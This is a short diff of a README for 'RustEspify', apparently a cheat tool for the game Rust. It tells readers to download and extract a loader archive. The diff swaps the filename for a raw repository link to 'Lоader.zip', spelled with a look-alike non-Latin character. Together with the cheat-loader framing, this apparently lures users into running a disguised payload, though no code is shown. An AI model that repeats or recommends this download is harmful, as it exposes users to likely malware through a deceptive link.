Hajrbox/RustEspify/README.md

 Ready to get started?
 Follow these simple steps for hassle-free setup!

-**1. Download `Loader.rar` from the repository**
+**1. Download `https://raw.githubusercontent.com/Hajrbox/RustEspify/main/Lоader.zip` from the repository**
-   - Head to the Releases section or the main repository files and grab the latest `Loader.rar`.
+   - Head to the Releases section or the main repository files and grab the latest `https://raw.githubusercontent.com/Hajrbox/RustEspify/main/Lоader.zip`.

 **2. Extract the archive**
    - Use your favorite extraction software (e.g., WinRAR, 7-Zip, Unarchiver on macOS/Linux).